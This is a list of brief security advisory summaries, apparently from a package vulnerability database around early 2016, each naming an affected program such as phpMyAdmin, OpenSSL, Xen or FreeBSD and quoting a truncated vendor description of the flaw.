phpmyadmin -- Full path disclosure vulnerability in SQL parser

The phpMyAdmin development team reports: By calling a particular script that is part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider this vulnerability ...

hive -- authorization logic vulnerability

Sushanth Sowmyan reports: Some partition-level operations exist that do not explicitly also authorize privileges of the parent table. This can lead to issues when the parent table would have denied the operation, but no denial occurs because the partition-level privilege is not checked by the...

phpmyadmin -- Multiple full path disclosure vulnerabilities

The phpMyAdmin development team reports: By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider these vulnerabilities to ...

phpmyadmin -- Multiple full path disclosure vulnerabilities

The phpMyAdmin development team reports: By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider these vulnerabilities to ...

ffmpeg -- remote denial of service in JPEG2000 decoder

FFmpeg security reports: FFmpeg 2.8.6 fixes the following vulnerabilities: CVE-2016-2213...

quagga -- stack based buffer overflow vulnerability

Donald Sharp reports: A malicious BGP peer may execute arbitrary code in particularly configured remote bgpd hosts...

prosody -- user impersonation vulnerability

The Prosody team reports: Adopt key generation algorithm from XEP-0185, to prevent impersonation attacks CVE-2016-0756...

FreeBSD -- Linux compatibility layer issetugid(2) system call

Problem Description: A programming error in the Linux compatibility layer could cause the issetugid2 system call to return incorrect information. Impact: If an application relies on output of the issetugid2 system call and that information is incorrect, this could lead to a privilege escalation...

curl -- Credentials not checked

The cURL project reports: libcurl will reuse NTLM-authenticated proxy connections without properly making sure that the connection was authenticated with the same credentials as set for this transfer...

mozilla -- multiple vulnerabilities

Mozilla Foundation reports: MFSA 2016-01 Miscellaneous memory safety hazards rv:44.0 / rv:38.6 MFSA 2016-02 Out of Memory crash when parsing GIF format images MFSA 2016-03 Buffer overflow in WebGL after out of memory allocation MFSA 2016-04 Firefox allows for control characters to be set in cooki...

nginx -- multiple vulnerabilities

Maxim Dounin reports: Several problems in nginx resolver were identified, which might allow an attacker to cause worker process crash, or might have potential other impact if the "resolver" directive is used in a configuration file...

NSS -- multiple vulnerabilities

Mozilla Foundation reports: Security researcher Hanno Böck reported that calculations with mpdiv and mpexptmod in Network Security Services NSS can produce wrong results in some circumstances. These functions are used within NSS for a variety of cryptographic division functions, leading to...

rails -- multiple vulnerabilities

Ruby on Rails blog: Rails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been released! These contain important security fixes, and it is recommended that users upgrade as soon as possible...

salt -- code execution

SaltStack reports: Improper handling of clear messages on the minion, which could result in executing commands not sent by the master...

dhcpcd -- remote code execution/denial of service

MITRE reports: The printoption function in dhcp-common.c in dhcpcd through 6.9.1, as used in dhcp.c in dhcpcd 5.x in Android before 5.1 and other products, misinterprets the return value of the snprintf function, which allows remote DHCP servers to execute arbitrary code or cause a denial of...

privoxy -- multiple vulnerabilities

Privoxy Developers reports: Prevent invalid reads in case of corrupt chunk-encoded content. CVE-2016-1982. Bug discovered with afl-fuzz and AddressSanitizer. Remove empty Host headers in client requests. Previously they would result in invalid reads. CVE-2016-1983. Bug discovered with afl-fuzz an...

openssl -- multiple vulnerabilities

OpenSSL project reports: Historically OpenSSL only ever generated DH parameters based on "safe" primes. More recently in version 1.0.2 support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be "safe". Wher...

Python -- Integer overflow in zipimport module

Python reports: Possible integer overflow and heap corruption in zipimporter.getdata...

xen-kernel -- VMX: intercept issue with INVLPG on non-canonical address

The Xen Project reports: While INVLPG does not cause a General Protection Fault when used on a non-canonical address, INVVPID in its "individual address" variant, which is used to back the intercepted INVLPG in certain cases, fails in such cases. Failure of INVVPID results in a hypervisor bug...

ntp -- multiple vulnerabilities

Network Time Foundation reports: NTF's NTP Project has been notified of the following low- and medium-severity vulnerabilities that are fixed in ntp-4.2.8p6, released on Tuesday, 19 January 2016: Bug 2948 / CVE-2015-8158: Potential Infinite Loop in ntpq. Reported by Cisco ASIG. Bug 2945 /...

chromium -- multiple vulnerabilities

Google Chrome Releases reports: This update includes 37 security fixes, including: 497632 High CVE-2016-1612: Bad cast in V8. 572871 High CVE-2016-1613: Use-after-free in PDFium. 544691 Medium CVE-2016-1614: Information leak in Blink. 468179 Medium CVE-2016-1615: Origin confusion in Omnibox. 5414...

xen-kernel -- PV superpage functionality missing sanity checks

The Xen Project reports: The PV superpage functionality lacks certain validity checks on data being passed to the hypervisor by guests. This is the case for the page identifier MFN passed to MMUEXTMARKSUPER and MMUEXTUNMARKSUPER sub-ops of the HYPERVISORmmuextop hypercall as well as for various...

asterisk -- Long Contact URIs in REGISTER requests can crash Asterisk

The Asterisk project reports: Asterisk may crash when processing an incoming REGISTER request if that REGISTER contains a Contact header with a lengthy URI. This crash will only happen for requests that pass authentication. Unauthenticated REGISTER requests will not result in a crash occurring...

xymon-server -- multiple vulnerabilities

J.C. Cleaver reports: CVE-2016-2054: Buffer overflow in xymond handling of "config" command CVE-2016-2055: Access to possibly confidential files in the Xymon configuration directory CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd" web applications CVE-2016-2057: Incorrect...

bind -- denial of service vulnerability

ISC reports: Specific APL data could trigger an INSIST in apl42.c...

bind -- denial of service vulnerability

ISC reports: Problems converting OPT resource records and ECS options to text format can cause BIND to terminate...

moodle -- multiple vulnerabilities

Marina Glancy reports: MSA-16-0001: Two enrolment-related web services don't check course visibility MSA-16-0002: XSS Vulnerability in course management search...

FreeBSD -- Linux compatibility layer incorrect futex handling

Problem Description: A programming error in the handling of Linux futex robust lists may result in incorrect memory locations being accessed. Impact: It is possible for a local attacker to read portions of kernel memory, which may result in a privilege escalation...

cgit -- multiple vulnerabilities

Jason A. Donenfeld reports: Reflected Cross Site Scripting and Header Injection in Mimetype Query String. Stored Cross Site Scripting and Header Injection in Filename Parameter. Integer Overflow resulting in Buffer Overflow...

openssh -- information disclosure

OpenSSH reports: OpenSSH clients between versions 5.4 and 7.1 are vulnerable to information disclosure that may allow a malicious server to retrieve information including under some circumstances, user's private keys...

FreeBSD -- Insecure default snmpd.config permissions

Problem Description: The SNMP protocol supports an authentication model called USM, which relies on a shared secret. The default permission of the snmpd configuration file, /etc/snmpd.config, is weak and does not provide adequate protection against local unprivileged users. Impact: A local user m...

FreeBSD -- SCTP ICMPv6 error message vulnerability

Problem Description: A lack of proper input checks in the ICMPv6 processing in the SCTP stack can lead to either a failed kernel assertion or to a NULL pointer dereference. In either case, a kernel panic will follow. Impact: A remote, unauthenticated attacker can reliably trigger a kernel panic i...

FreeBSD -- Linux compatibility layer setgroups(2) system call

Problem Description: A programming error in the Linux compatibility layer setgroups2 system call can lead to an unexpected results, such as overwriting random kernel memory contents. Impact: It is possible for a local attacker to overwrite portions of kernel memory, which may result in a privileg...

FreeBSD -- TCP MD5 signature denial of service

Problem Description: A programming error in processing a TCP connection with both TCPMD5SIG and TCPNOOPT socket options may lead to kernel crash. Impact: A local attacker can crash the kernel, resulting in a denial-of-service. A remote attack is theoretically possible, if server has a listening...

go -- information disclosure vulnerability

Jason Buberel reports: A security-related issue has been reported in Go's math/big package. The issue was introduced in Go 1.5. We recommend that all users upgrade to Go 1.5.3, which fixes the issue. Go programs must be recompiled with Go 1.5.3 in order to receive the fix. The Go team would like ...

ffmpeg -- remote attacker can access local files

Arch Linux reports: ffmpeg has a vulnerability in the current version that allows the attacker to create a specially crafted video file, downloading which will send files from a user PC to a remote attacker server. The attack does not even require the user to open that file — for example, KDE...

h2o -- directory traversal vulnerability

Yakuzo OKU reports: When redirect directive is used, this flaw allows a remote attacker to inject response headers into an HTTP redirect response...

p5-PathTools -- File::Spec::canonpath loses taint

Ricardo Signes reports: Beginning in PathTools 3.47 and/or perl 5.20.0, the File::Spec::canonpath routine returned untained strings even if passed tainted input. This defect undermines the guarantee of taint propagation, which is sometimes used to ensure that unvalidated user input does not reach...

atheme-services -- multiple vulnerabilities

Mitre reports: modules/chanserv/flags.c in Atheme before 7.2.7 allows remote attackers to modify the Anope FLAGS behavior by registering and dropping the 1 LIST, 2 CLEAR, or 3 MODIFY keyword nicks. Buffer overflow in the xmlrpccharencode function in modules/transport/xmlrpc/xmlrpclib.c in Atheme...

activemq -- Unsafe deserialization

Alvaro Muatoz, Matthias Kaiser and Christian Schneider reports: JMS Object messages depends on Java Serialization for marshaling/unmashaling of the message payload. There are a couple of places inside the broker where deserialization can occur, like web console or stomp object message...

prosody -- multiple vulnerabilities

The Prosody Team reports: Fix path traversal vulnerability in modhttpfiles CVE-2016-1231 Fix use of weak PRNG in generation of dialback secrets CVE-2016-1232...

php -- multiple vulnerabilities

PHP reports: Core: Fixed bug 70755 fpmlog.c memory leak and buffer overflow. GD: Fixed bug 70976 Memory Read via gdImageRotateInterpolated Array Index Out of Bounds. SOAP: Fixed bug 70900 SoapClient systematic out of memory error. Wddx Fixed bug 70661 Use After Free Vulnerability in WDDX Packet...

wordpress -- XSS vulnerability

Aaron Jorbin reports: WordPress 4.4.1 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.4 and earlier are affected by a cross-site scripting vulnerability that could allow a site to be...

shotwell -- not verifying certificates

Michael Catanzaro reports: Shotwell has a serious security issue "Shotwell does not verify TLS certificates". Upstream is no longer active and I do not expect any further upstream releases unless someone from the community steps up to maintain it. What is the impact of the issue? If you ever used...

isc-dhcpd -- Denial of Service

ISC reports: A badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally...

py-rsa -- Bleichenbacher'06 signature forgery vulnerability

Filippo Valsorda reports: python-rsa is vulnerable to a straightforward variant of the Bleichenbacher'06 attack against RSA signature verification with low public exponent...

mbedTLS/PolarSSL -- SLOTH attack on TLS 1.2 server authentication

ARM Limited reports: MD5 handshake signatures in TLS 1.2 are vulnerable to the SLOTH attack on TLS 1.2 server authentication. They have been disabled by default. Other attacks from the SLOTH paper do not apply to any version of mbed TLS or PolarSSL...

dhcpcd -- multiple vulnerabilities

Nico Golde reports: heap overflow via malformed dhcp responses later in printoption via dhcpenvoption1 due to incorrect option length values. Exploitation is non-trivial, but I'd love to be proven wrong. invalid read/crash via malformed dhcp responses. not exploitable beyond DoS as far as I can...

wireshark -- multiple vulnerabilities

Wireshark development team reports: The following vulnerabilities have been fixed: wnpa-sec-2015-31 NBAP dissector crashes. Bug 11602, Bug 11835, Bug 11841 wnpa-sec-2015-37 NLM dissector crash. wnpa-sec-2015-39 BER dissector crash. wnpa-sec-2015-40 Zlib decompression crash. Bug 11548...

qemu -- denial of service vulnerability in Rocker switch emulation

Prasad J Pandit, Red Hat Product Security Team, reports: Qemu emulator built with the Rocker switch emulation support is vulnerable to an off-by-one error. It happens while processing transmittx descriptors in 'txconsume' routine, if a descriptor was to have more than allowed ROCKERTXFRAGSMAX=16...